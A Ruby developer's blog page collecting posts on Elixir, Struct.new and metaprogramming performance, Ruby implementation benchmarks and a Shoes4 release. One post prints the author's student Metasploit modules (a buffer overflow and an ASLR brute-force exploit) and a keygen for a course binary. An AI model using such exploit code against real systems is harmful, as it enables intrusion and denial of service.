Category: Ruby

Slides: Ruby to Elixir – what’s great and what you might miss

This is a talk I gave at the Polyglot Tech Meetup in Berlin in April. It reuses parts of my previous Elixir talk while adding a new perspective, comparing Ruby and Elixir more directly. It is also shorter, as it served as an intro to a fun panel discussion.

Abstract

Elixir and Phoenix are known for their speed, but that’s far from their only benefit. Elixir isn’t just a fast Ruby, and Phoenix isn’t just Rails for Elixir. Through pattern matching, immutable data structures and new idioms your programs can not only become faster but also more understandable and maintainable. While we look at the upsides, we’ll also have a look at what you might miss and what could be improved.

Slides

Don’t you Struct.new(…).new(…)

As I just happened upon it again, I gotta take a moment to talk about one of my most despised ruby code patterns ever since I first encountered it: Struct.new(...).new.

Struct.new?

Struct.new is a convenient way to create a class with accessors:

2.2.2 :001 > Extend = Struct.new(:start, :length)
 => Extend 
2.2.2 :002 > instance = Extend.new(10, 20)
 => #<struct Extend start=10, length=20> 
2.2.2 :003 > instance.start
 => 10 
2.2.2 :004 > instance.length
 => 20

That’s neat, isn’t it? It is, but like much of Ruby’s power it needs to be wielded with caution.

Where Struct.new goes wrong – the second new

When you do Struct.new you create an anonymous class; another new on it creates an instance of that class. Therefore, Struct.new(...).new(...) creates an anonymous class and an instance of it at the same time. This is bad, as we create a whole class just to create a single instance of it! That is a capital waste.
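You can see the waste directly in IRB: every call to Struct.new returns a brand new anonymous class, so two values created this way don’t even share a class – and consequently don’t even compare as equal:

first  = Struct.new(:start, :length).new(10, 20)
second = Struct.new(:start, :length).new(10, 20)

first.class == second.class # => false, two distinct anonymous classes
first == second             # => false, struct equality requires the same class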

As a one-off use it might be okay, for instance when you put it in a constant. The sad part is that this is not the only way I’ve seen it used. As in the first case I encountered, I keep seeing it inside code that is invoked frequently – some sort of hot loop with calculations where more than one value is needed to represent the result. Here programmers sometimes seem to reach for Struct.new(...).new(...).

Why is that bad?

Well, it incurs unnecessary overhead: creating the class every single time simply isn’t needed. Not only that – as far as I understand it, each anonymous class also gets its own independent entries in the method cache. For JITed implementations (like JRuby) the methods would also be JITed independently. And it gets in the way of profiling, as you see lots of anonymous classes with only 1 to 10 method calls each.

But how bad is that performance hit? I wrote a little benchmark where an instance is created with 2 values and then those 2 values are read one time each. Once with Struct.new(...).new(...), once where the Struct.new(...) is saved in an intermediary constant. For fun and learning I threw in a similar usage with Array and Hash.

require 'benchmark/ips'

Benchmark.ips do |bm|
  bm.report "Struct.new(...).new" do
    value = Struct.new(:start, :end).new(10, 20)
    value.start
    value.end
  end

  SavedStruct = Struct.new(:start, :end)
  bm.report "SavedStruct.new" do
    value = SavedStruct.new(10, 20)
    value.start
    value.end
  end

  bm.report "2 element array" do
    value = [10, 20]
    value.first
    value.last
  end

  bm.report "Hash with 2 keys" do
    value = {start: 10, end: 20}
    value[:start]
    value[:end]
  end

  bm.compare!
end

I ran those benchmarks with CRuby 2.3. And the results – well, I was surprised how huge the impact really is. The “new-new” implementation is over 33 times slower than the SavedStruct equivalent, and about 54 times slower than the fastest solution (a plain Array), although that’s not my preferred solution either.

Struct.new(...).new    137.801k (± 3.0%) i/s -    694.375k
SavedStruct.new      4.592M (± 1.7%) i/s -     22.968M
2 element array      7.465M (± 1.4%) i/s -     37.463M
Hash with 2 keys      2.666M (± 1.6%) i/s -     13.418M
Comparison:
2 element array:  7464662.6 i/s
SavedStruct.new:  4592490.5 i/s - 1.63x slower
Hash with 2 keys:  2665601.5 i/s - 2.80x slower
Struct.new(...).new:   137801.1 i/s - 54.17x slower
Benchmark in iterations per second (higher is better)

But that’s not all…

This is not just about performance, though. When people take this “shortcut” they also circumvent one of the hardest problems in programming – naming. What is that Struct with those values? Do the values have any connection at all, or were they just smashed together because it seemed convenient at the time? What’s missing is the identification of the core concept that these values represent – anything signaling that this is more than a clump of data with two values that also happens to perform very poorly.

So, please avoid using Struct.new(...).new(...) – use a better alternative. Don’t recreate a class over and over – give it a name, put it into a constant and enjoy a better understanding of the concepts and increased performance.

Benchmarking a Go AI in Ruby: CRuby vs. Rubinius vs. JRuby vs. Truffle/Graal

The world of Artificial Intelligences is often full of performance questions. How fast can I compute a value? How far can I look ahead in a tree? How many nodes can I traverse?

In Monte Carlo Tree Search one of the most defining questions is “How many simulations can I run per second?” If you want to learn more about Monte Carlo Tree Search and its application to the board game Go, I recommend the video and slides of my talk on that topic from RubyConf 2015.

Implementing my own AI – rubykon – in Ruby of course isn’t going to get me the fastest implementation ever. It does force you to do less work and therefore make nice performance optimizations, though. That’s not what this post is about either. Here I want to take a look at another question: “How fast can Ruby go?” Ruby is a language with surprisingly many well-maintained implementations – most prominently CRuby, Rubinius, JRuby and the newcomer JRuby + Truffle. How do they perform at this task?

The project

Rubykon is a relatively small project – right now the lib directory has less than 1200 lines of code (which includes a small benchmarking library… more on that later). It has no external runtime dependencies – not even the standard library. So it is very minimalistic and also tuned for performance.

Setup

The benchmarks were run with the pre-0.3.0 rubykon version on the 8th of November (sorry, writeups always take longer than you think!) with the following concrete ruby versions (slightly abbreviated in the rest of the post):

  • CRuby 1.9.3p551
  • CRuby 2.2.3p173
  • Rubinius 2.5.8
  • JRuby 1.7.22
  • JRuby 9.0.3.0
  • JRuby 9.0.3.0 run in server mode and with invoke dynamic enabled (denoted as + id)
  • JRuby + Truffle Graal with master from 2015-11-08 and commit hash fd2c179, running on graalvm-jdk1.8.0

You can find the raw data (performance numbers, concrete version outputs, benchmark results for different board sizes and historic benchmark results) in this file.

This was run on my pretty dated desktop PC (i7 870):


tobi@tobi-desktop ~ $ uname -a
Linux tobi-desktop 3.16.0-38-generic #52~14.04.1-Ubuntu SMP Fri May 8 09:43:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
tobi@tobi-desktop ~ $ java -version
openjdk version "1.8.0_45-internal"
OpenJDK Runtime Environment (build 1.8.0_45-internal-b14)
OpenJDK 64-Bit Server VM (build 25.45-b02, mixed mode)
tobi@tobi-desktop ~ $ lscpu
Architecture:          x86_64
CPU op-mode(s):        32-bit, 64-bit
Byte Order:            Little Endian
CPU(s):                8
On-line CPU(s) list:   0-7
Thread(s) per core:    2
Core(s) per socket:    4
Socket(s):             1
NUMA node(s):          1
Vendor ID:             GenuineIntel
CPU family:            6
Model:                 30
Stepping:              5
CPU MHz:               1200.000
BogoMIPS:              5887.87
Virtualization:        VT-x
L1d cache:             32K
L1i cache:             32K
L2 cache:              256K
L3 cache:              8192K
NUMA node0 CPU(s):     0-7

First benchmark: Simulation + Scoring on 19×19

This benchmark uses benchmark-ips to see how many playouts (simulation + scoring) can be done per second. This is basically the “evaluation function” of the Monte Carlo Method. Here we start with an empty board and then play random valid moves until there are no valid moves anymore and then we score the game. The performance of a MCTS AI is hugely dependent on how fast that can happen.
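Conceptually, a playout and the harness around it boil down to something like the following sketch – this is an illustration, not rubykon’s actual API (playout and fresh_19x19_game are made-up names):

require 'benchmark/ips'

# conceptual playout: play random valid moves until none are left, then score
def playout(game)
  game.play(game.valid_moves.sample) until game.valid_moves.empty?
  game.score
end

Benchmark.ips do |benchmark|
  benchmark.config time: 30, warmup: 60 # the run/warmup times described below

  benchmark.report "19x19 playout (simulation + scoring)" do
    playout(fresh_19x19_game) # hypothetical helper returning an empty 19x19 game
  end
end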

Benchmarks were run with a warmup time of 60 seconds and a run time of 30 seconds. The small black bars in the graph denote standard deviation. Results:

[Figure: 19_19_ips.png – Full 19×19 playout, iterations per second (higher is better)]
Ruby version                       iterations/s   standard deviation
CRuby 1.9.3p551                         44.952           8.90%
CRuby 2.2.3p173                         55.403           7.20%
Rubinius 2.5.8                          40.911           4.90%
JRuby 1.7.22                            63.456          15.80%
JRuby 9.0.3.0                           73.479           6.80%
JRuby 9.0.3.0 + invoke dynamic         121.265          14.00%
JRuby + Truffle                        192.420          14.00%

JRuby + Truffle runs on a slightly modified version of benchmark-ips. This is done because it is a highly optimizing and speculative runtime, for which the standard benchmarking approach leads to bad results after warmup. This is explained here.

Second benchmark: Full UCT Monte Carlo Tree Search with 1000 playouts

This benchmark does a full Monte Carlo Tree Search, meaning choosing a node to investigate, doing a full simulation and scoring there and then propagating the results back in the tree before starting over again. As the performance is mostly dependent on the playouts the graph looks a lot like the one above.

This uses benchmark-avg, which I wrote myself and which (for now) still lives in the rubykon repository. Why a new benchmarking library? In short: I needed something for more “macro” benchmarks that gives nice output like benchmark-ips. Also, I wanted a benchmarking tool that plays nice with Truffle – which means doing the warmup and run of a benchmark directly after one another, as detailed in this issue.

This uses a warmup time of 3 minutes and a run time of 2 minutes. Along with the iterations per minute, we have another graph depicting average run time.

[Figure: 19_19_ipm.png – MCTS on 19×19 with 1000 playouts, iterations per minute (higher is better)]
[Figure: 19_19_avg.png – MCTS on 19×19 with 1000 playouts, average run time (lower is better)]
Ruby version                       iterations/min   average time (s)   standard deviation
CRuby 1.9.3p551                          1.61             37.26               2.23%
CRuby 2.2.3p173                          2.72             22.09               1.05%
Rubinius 2.5.8                           2.10             28.52               2.59%
JRuby 1.7.22                             3.94             15.23               1.61%
JRuby 9.0.3.0                            3.70             16.23               2.48%
JRuby 9.0.3.0 + invoke dynamic           7.02              8.55               1.92%
JRuby + Truffle                          9.49              6.32               8.33%

Results here pretty much mirror the previous benchmark, although the standard deviation is smaller throughout, which might be because more non-random code execution is involved.

Otherwise the relative performance of the different implementations is more or less the same, with the notable exception of JRuby 1.7 performing better than 9.0 (without invoke dynamic). That could be an oddity, but the difference between the two was also well within the margin of error in the first benchmark.

For the discussion below I’ll refer to this benchmark, as it ran on the same code for all implementations and has a lower standard deviation overall.

Observations

The most striking observation certainly is that JRuby + Truffle/Graal sits atop the benchmarks by a good margin. That’s not too surprising when you look at previous work done here, suggesting speedups of 9x to 45x compared to CRuby. Here the speedup relative to CRuby is “just” 3.5x, which teaches us to always run our own benchmarks.

It is also worth noting that Truffle was unexpectedly very slow at first (10 times slower than 1.9), so I opened an issue and reported that somewhat surprising lack of performance. Chris Seaton was quick to fix it, and along the way he kept an amazing log of the things he did to diagnose the problem and make it faster. If you ever wanted to take a peek into the mind of a Ruby implementer – go ahead and read it!

At the same time I gotta say that the warmup time it takes has me worried a bit. This is a very small application with one very hot loop (generating the valid moves), and it doesn’t even use the standard library. The warmup times are rather huge precisely for Truffle, and I made sure not to call any other code in benchmark/avg, as that might deoptimize everything again. However, it is still at an early stage and I know they are working on it 🙂

Second, “normal” JRuby is faster than CRuby, which is not much of a surprise to me – in most benchmarks I do, JRuby comes up ~twice as fast as CRuby. So when it was only ~30% faster I was actually a bit disappointed, but then remembered the --server -Xcompile.invokedynamic=true switches and enabled them. BOOM! Almost 2.6 times faster than CRuby! Almost 90% faster than JRuby without those switches.

Now you might ask: “Why isn’t this the default?” Well, it used to be the default. Optimizing takes time, and that slows down the startup time – for, say, rails – significantly, which is why it got deactivated by default.
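In case you want to try this yourself, it is just a matter of passing those switches to jruby when running your benchmark (the script name here is made up):

jruby --server -Xcompile.invokedynamic=true rubykon_benchmark.rb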

If I’m missing any of these magic switches for any of the other implementations please let me know and I’ll add them.

I’m also a bit sad to see rubinius somewhere between 1.9 and 2.2 performance-wise; I had higher hopes for its performance given some appropriate warmup time.

Opal is also notably missing; I couldn’t get it to run, but I will try again with a future version to see what V8 can optimize here.

An important word of warning to conclude the high level look at the different implementations: These benchmarks are most likely not true for your application! Especially not for rails! Benchmark yourself 🙂

Now for another question that you probably have on your mind: “How fast is this compared to other languages/implementations?” See, that’s hard to answer. No serious Go engine does pure random playouts; they all use heuristics that slow them down significantly. But they are still faster. Here’s some data from this computer go thread, all referring to the 19×19 board size:

  • it is suggested that one should be able to do at least 100 000 playouts per second without heuristics
  • with light playouts, Aya did 25 000 playouts per second in 2008
  • the well-known C engine pachi does 2000 heavy playouts per thread per second

Which leads us to the question…

Is this the end of the line for Ruby?

No, there are still a couple of improvements that I have in mind that can make it much faster. How much faster? I don’t know. I have this goal of 1000 playouts on 19×19 per second per thread in mind. It’s still way behind other languages, but hey we’re talking about Ruby here 😉

Some possible improvements:

  • Move generation can still be improved a lot: instead of always searching for a new valid random move, a list of valid moves could be kept around, but that’s tricky
  • Scoring can also be done faster by leveraging neighbouring cells, but it’s not the bottleneck (yet)
  • a very clever but less accurate data structure can be used for liberty counting
  • also, of course, actually parallelize it and run on multiple threads
  • I could also use an up to date CPU for a change 😉

Other than that, I’m also looking to the ruby implementations to get better, optimize more and make this even faster. I have especially high hopes for JRuby and JRuby + Truffle here.

So in the future I’ll try to find out how fast this can actually get, which is a fun ride and has taught me a lot so far already! You should try playing the benchmark game for yourselves 🙂

The not so low cost of calling dynamically defined methods

There are a couple of mantras that exist across programming communities; one of them is to avoid duplication, or to keep it DRY. Programming languages equip us with different tools to avoid duplication. In Ruby a popular way to achieve this is metaprogramming. Methods are dynamically defined to get rid of all duplication and we rejoice – yay! There might be other problems with metaprogrammed solutions, but at least we are sure that the performance is the same as if we’d written that duplicated code. Or are we?

As the title suggests, this post examines the performance of these metaprogrammed methods. If you are looking for method definition performance or pure call overhead, you’ll find that information in this post by Aaron Patterson.

Before we get into the details I want to quickly highlight that this is not some theoretical micro benchmark I pulled out of thin air. These examples are derived from performance improvements on an actual project. That work was done by my friend Jason R. Clark on this pull request over at Shoes 4. As he doesn’t have time to write it up – I get to, so let’s get to it!

Let’s look at some methods!

(Please be aware that this example is simplified – of course the real code has varying parts, most importantly the name of the instance variable, which is the reason the code was metaprogrammed in the first place.)

class FakeDimension
  def initialize(margin_start)
    @margin_start = margin_start
    @margin_start_relative = relative? @margin_start
  end

  def relative?(result)
    result.is_a?(Float) && result <= 1
  end

  def calculate_relative(result)
    (result * 100).to_i
  end

  define_method :full_meta do
    instance_variable_name = '@' + :margin_start.to_s
    value = instance_variable_get(instance_variable_name)
    value = calculate_relative value if relative? value
    value
  end

  IVAR_NAME = "@margin_start"
  define_method :hoist_ivar_name do
    value = instance_variable_get(IVAR_NAME)
    value = calculate_relative value if relative? value
    value
  end

  define_method :direct_ivar do
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end

  eval <<-CODE
  def full_string
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
  CODE

  def full_direct
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
end

Starting with the first define_method, these are all more or less the same method. We start with a fully metaprogrammed version, which even converts a symbol to an instance variable name, and end with a directly defined method without any metaprogramming. Now with all these methods being so similar, you’d expect them to have roughly the same performance characteristics, right? Well, such is not the case, as the following benchmark demonstrates. I benchmarked these methods both for the case where the value is relative and for when it is not; the results are not too different – see the gist for details.
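The harness is a plain benchmark-ips run, roughly along these lines (a sketch – the exact setup lives in the gist):

require 'benchmark/ips'

# 400 is not relative (not a Float <= 1); 0.5 would exercise the relative branch
dimension = FakeDimension.new(400)

Benchmark.ips do |bm|
  bm.report("full_meta")       { dimension.full_meta }
  bm.report("hoist_ivar_name") { dimension.hoist_ivar_name }
  bm.report("direct_ivar")     { dimension.direct_ivar }
  bm.report("full_string")     { dimension.full_string }
  bm.report("full_direct")     { dimension.full_direct }
  bm.compare!
end

Running the non-relative version on CRuby 2.2.2 with benchmark-ips I get the following results (higher is better):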

           full_meta      1.840M (± 3.0%) i/s -      9.243M
     hoist_ivar_name      3.147M (± 3.3%) i/s -     15.813M
         direct_ivar      5.288M (± 3.1%) i/s -     26.553M
         full_string      6.034M (± 3.2%) i/s -     30.179M
         full_direct      5.955M (± 3.2%) i/s -     29.807M

Comparison:
         full_string:  6033829.1 i/s
         full_direct:  5954626.6 i/s - 1.01x slower
         direct_ivar:  5288105.5 i/s - 1.14x slower
     hoist_ivar_name:  3146595.7 i/s - 1.92x slower
           full_meta:  1840087.6 i/s - 3.28x slower

And look at that: the full_meta version is over 3 times slower than the directly defined method! Of course direct_ivar is also pretty close to full performance, but it’s an unrealistic scenario, as the varying instance variable name is the whole point. You can interpolate that name into the string of the method definition in the full_string version, though. This achieves results as if the method had been directly defined. But what’s happening here?

It seems that there is a higher-than-expected cost associated with calling instance_variable_get, creating the necessary string, and calling methods defined by define_method in general. If you want to keep full performance but still vary the code, you have to resort to the evil eval and stitch your code together with string interpolation. Yay.
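To make that concrete, here is a sketch of what such an eval-based definition could look like when the instance variable name actually varies (ivar is a stand-in for whatever varies in the real code):

class FakeDimension
  ivar = :margin_start # this is the part that varies in the real code

  eval <<-CODE
  def #{ivar}_from_string
    value = @#{ivar}
    value = calculate_relative value if relative? value
    value
  end
  CODE
end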

So what, do we all have to eval method definitions for metaprogramming now?

Thankfully no. The performance overhead is constant – if your method does more expensive calculations, the overhead diminishes. This is the somewhat rare case of a method that doesn’t do much (even the slowest version can be executed almost 2 million times per second) but is called a lot. It is one of the core methods when positioning UI objects in Shoes. Obviously we should also do the hard work and try not to call that method so often; we’re working on that and have already made some nice progress. But, to quote Jason, “regardless what we do I think that Dimension is bound to always be in our hot path.”

What about methods that do more though? Let’s take a look at an example where we have an object that has an array set as an instance variable and has a method that concatenates another array and sorts the result (full gist):

class Try

  def initialize(array)
    @array = array
  end

  define_method :meta_concat_sort do |array|
    value = instance_variable_get '@' + :array.to_s
    new_array = value + array
    new_array.sort
  end

  def concat_sort(array)
    new_array = @array + array
    new_array.sort
  end
end

We then benchmark those two methods with the same base array but two differently sized input arrays:

BASE_ARRAY        = [8, 2, 400, -4, 77]
SMALL_INPUT_ARRAY = [1, 88, -7, 2, 133]
BIG_INPUT_ARRAY   = (1..100).to_a.shuffle
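The harness again is a plain benchmark-ips run per input size, roughly like this (the full version is in the linked gist):

require 'benchmark/ips'

try = Try.new(BASE_ARRAY)

[SMALL_INPUT_ARRAY, BIG_INPUT_ARRAY].each do |input|
  Benchmark.ips do |bm|
    bm.report("meta_concat_sort") { try.meta_concat_sort(input) }
    bm.report("concat_sort")      { try.concat_sort(input) }
    bm.compare!
  end
end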

What’s the result?

Small input array
Calculating -------------------------------------
    meta_concat_sort    62.808k i/100ms
         concat_sort    86.143k i/100ms
-------------------------------------------------
    meta_concat_sort    869.940k (± 1.4%) i/s -      4.397M
         concat_sort      1.349M (± 2.6%) i/s -      6.805M

Comparison:
         concat_sort:  1348894.9 i/s
    meta_concat_sort:   869940.1 i/s - 1.55x slower

Big input array
Calculating -------------------------------------
    meta_concat_sort    18.872k i/100ms
         concat_sort    20.745k i/100ms
-------------------------------------------------
    meta_concat_sort    205.402k (± 2.7%) i/s -      1.038M
         concat_sort    231.637k (± 2.5%) i/s -      1.162M

Comparison:
         concat_sort:   231636.7 i/s
    meta_concat_sort:   205402.2 i/s - 1.13x slower

With the small input array the dynamically defined method is still over 50% slower than the non-metaprogrammed method! When we have the big input array (100 elements) the metaprogrammed method is still 13% slower, which I still consider very significant.

I ran these with CRuby 2.2.2, in case you are wondering whether this is implementation-specific. I ran the same benchmark with JRuby and got comparable results: JRuby is usually 1.2 to 2 times faster than CRuby overall, but the relative slowdowns were about the same.

So in the end, what does it mean? Always benchmark. Don’t blindly optimize calls like these, as in the grand scheme of things they might not make a difference. This only really matters for methods that get called a lot. If such a method is in your library/application, then replacing the metaprogrammed method definition might yield surprising performance improvements.

UPDATE 1: Shortly after this post was published, coincidentally JRuby 9.0.3.0 was released with improvements to the call speed of methods defined by define_method. I added the benchmarks to the comments of the gist. full_meta and hoist_ivar_name got 7-15% faster, and direct_ivar is now about as fast as its full_string and full_direct counterparts thanks to the optimizations!

UPDATE 2: I wrote a small benchmark about what I think is the bottleneck here – instance_variable_get. It is missing the slowest case, but instance_variable_get still comes out up to 3 times slower than direct access.

My first ruby script – what was yours?

Can you still remember the first program you ever wrote? The first program you ever wrote in your current favorite language? How far you’ve come and how much you’ve learned since then?

I think it’s important to acknowledge this fact and let people know. Often beginners tell me that they can’t really imagine getting from where they are right now in terms of programming skill to where more experienced people are. Therefore, I think it’s important to show where even experienced developers come from, to give some perspective.

I can’t currently locate the code of the first programs I ever wrote. I know exactly (and still have) my first ruby scripts, though. At that time I was already in the third semester of my bachelor’s degree, mostly focused on security in my studies. It was January of 2010 and we had a special task to earn bonus points in the Internet Security course by writing two exploits and a key generator. I decided to use these tasks to learn me some ruby – without reading a book about it or anything. The code is heavily commented, as we had to hand it in and that was one of the requirements.

So here goes the code (unmodified, as handed in). I want to share it to show people what horrible unruby-ish code I used to write. I want to encourage you to do the same. Maybe tweet it out with #myfirstrubyscript and a link to a gist or so?

Here is the gist for my first couple of ruby scripts, they are probably easier to read over there as my current blog layout is too narrow: Tobi’s first ruby scripts

The first exploit

The first exploit was for a service on a provided debian system that was vulnerable to a buffer overflow. We just had the binary and had to go from there.

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask11',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 5 $',
      'Payload'        =>
        {
          'Space'    => 1540,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbfffef34,
              'BufSize' => 1640  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # The exploit method connects to the remote service and sends the payload
  # followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
  #
  def exploit
    connect
 
    print_status ("Start exploiting the vulnerable debianmachine")
    #
    # Build the buffer for transmission
    # the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
    # so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
    #
    buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
    print_status("Sending #{buf.length} byte data")
 
    # Send it off
    sock.put(buf)
    sock.get
 
    handler
 
  end
 
end

The second exploit (ASLR)

This time the target was a gentoo machine I believe (despite what the first comment says), and the special problem was that the machine used ASLR – Address Space Layout Randomization, a technique that hinders buffer overflow exploits, as the return address you need to jump to changes. My solution to that is error-prone and doesn’t always work, but see for yourselves 🙂

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  # take note of the description as I couldn't find another way in time.
  # possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack....
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask12',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
     you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards
     through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c).
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 100 $',  
      'Payload'        =>
        {
          'Space'    => 400,  #should be enough for most of the payloads
          'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized)
              'BufSize' => 1032  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle).
  #
  def exploit
 
    print_status ("Start exploiting the vulnerable gentoomachine")
    #
    # initialization here we determine a couple of important values
    #
    return_address = target.ret
    nops_after_payload = 12 # 4- aligned
    nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload  
    print_status("nops_before_payload: #{nops_before_payload}")
     
    # initialize the constant part of the buffer (for performancereasons)
    standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload )  
     
    # can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so )
    payload_offset = 4- payload.encoded.length % 4
     
 
     
    # as long as we don't reach a region where our buffer can't be we keep on trying.
    while  (return_address < 0xc0000000)  
      connect
      buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian)
      print_status("trying address #{return_address} ")
      # Send it off
      sock.put(buf)
      sock.get
      handler
      return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned
      disconnect
    end
     
     
  end
 
end

The key generator

The last task was considerably easier than the first two: this time we just had a binary and had to generate keys that it would accept. In this code you can see me not using constants, but making up for it by using for loops. And probably lots of other terrible things – I didn’t want to look at it too closely 😉

# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy
 
## the numbers as taken from the binary, which are used to XOR encrypt the key  there
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]
 
# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
# sicne ruby doesn't really support multidimensional arrays out of the box we got
# to add an array as an element
possencr = Array.new
for i in 0..7 do
  #we're going to temporarily save the found values here
  temparray = []
  for j in 0..255 do
    keychar = j ^ encryptnumbers[i]
    # if keychar is printable
    if ((keychar >= 32) and (keychar <= 126))
      temparray << j
    end
  end
  possencr << temparray
end
 
# in the resulting array, the first index is also the index of the keys/encryptnumbers
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
# note that the numbers are in order (lowest number comes first)
# now we try to genereate a key
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
key = Array.new # saves the corresponding keychars
sum = 0
 for i in 0..4 do  #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
    crypt[i] = possencr[i][rand(possencr[i].length)]
    # key is automotically printable due to our awesome array
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # so here will be some magice, we'll use our last 3 chars to adjust the sum in  
  # such a way that it's between 97 and 122.
  # we're lucky, as I found out our last 3 possible encrypted chars, have no holes  
  # in the array, it's 95 elements each and all consecutive
  # 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
  offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255)  # &255 ---> take the last byte (least significant)
  if offset <0  
    offset = 256 + offset
  end
   
  # we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
  index = offset/3
  # now make the damned last three chars!
  for i in 5..7 do
    crypt[i] = possencr[i][index]
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # we just need the last byte
  sum = sum & 255
  key[8] = sum
 
#make them chars (not numbers)
for i in 0..8 do
  key[i]=key[i].chr
end
# make a string out of the array of chars
key = key.to_s
# output the key - BAM!
puts key

How about you?

What was your first ruby script? Can you still find and share it? If so, please tweet it out with #myfirstrubyscript to show that everyone eventually started small 🙂

Video: Shoes talk at JRubyConf 2013

Finally the video of my talk at JRubyConf 2013 in Berlin is online. It was my first full-length talk at a conference, and I gave it almost a year ago – some difficulties with the video material and getting it online caused the delay. Nonetheless, it is finally here! The talk was titled “Shoes – the Ruby Way to GUI applications” and now you can go ahead and watch it, or watch all the other amazing talks.

As the talk is a bit old, some of the information isn’t up to date anymore – most importantly regarding what still needs to be implemented, as we have made tremendous progress since then. We have a preview release out and are happily looking into the future 🙂

Shoes4 preview – the more personal release notes

As you might have noticed, a big project I’ve been working on for almost 2 years got its first release on the 10th of May, a bit more than 2 weeks ago. You can go read the official release announcement. This one is a bit more personal 😉

JAY A RELEASE!!!!

It’s been a long road since the 24th of May 2012, when the shoes community got together to concentrate efforts on the complete rewrite we now call shoes4. That is a long time – a time in which we made more than 2000 commits and closed nearly 600 issues.

Why did it take us so long? Well, rewrites are difficult… there is an older piece of software in place which kind of does what you want, but not really. Still, when you release, your new version has to be good enough. With this preview release we feel that all the major building blocks of the Shoes DSL itself are in place. Finally.

This release is really important to me. You know, it’s super hard to work on a project for so long without any release. Without any users. Other than your co-contributors there really aren’t many people playing with what you build. Not many people to report bugs. Not many people to build something awesome. Not many people telling you that what you do actually matters. Sometimes this makes it a bit hard to motivate yourself. Therefore I want to thank everyone who during that time encouraged any one of us, wrote an email saying that shoes is awesome, or even grabbed a release straight from github and tried it out. Every time that happened it put a big smile on my face and motivated me to put in a couple of hours of extra work. I ❤ you!

Hackers gonna hack

Of course a release doesn’t mean that people are really using what you build. I made a little effort writing the announcement blog post and sending out some announcement emails. So far we have a bit over 260 gem downloads, which is good, I guess 🙂 There will hopefully be wider coverage once we get a proper release out.

Of course, this is just a preview release. Nothing stable. We’re hard at work and already have some nice new bug fixes and improvements lined up. Stay tuned for the preview2 release and subsequent releases until we hit a release candidate!

Thanks

Last but not least I want to thank everyone who ever contributed to shoes4 – not only with code but also by reporting issues or just trying stuff out. Thank you, really – your support means a lot! Also to whoever funds or funded me on gittip – thank you!

More personalized thanks go out to Eric Watson and Jason R. Clark! Eric has probably been the most steady contributor to shoes4. He’s been there from the start, still is, still going strong. And hopefully will for a long time 🙂 Recently he’s been hard at work converting our specs to the rspec3 syntax. Jason on the other hand is a more recent addition to the team – his first commits date back to around September 2013. Nevertheless he’s been pretty hard at work solving vital issues and hard to crack bugs. Lately he’s been hunting down operating system handles we didn’t free up!

